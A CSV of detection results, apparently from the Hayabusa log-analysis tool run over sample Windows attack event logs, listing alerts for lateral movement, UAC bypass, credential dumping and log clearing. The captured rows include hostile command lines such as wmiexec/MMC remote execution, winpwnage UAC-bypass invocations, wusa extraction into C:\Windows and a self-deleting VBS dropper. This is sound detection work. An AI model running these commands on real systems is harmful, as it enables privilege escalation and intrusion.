-2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe : Path: C:\Windows\System32\VSSVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp"" : Path: C:\Windows\Installer\MSI4FFD.tmp : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx -2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx -2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx -2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" : Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx -2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /priv : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: 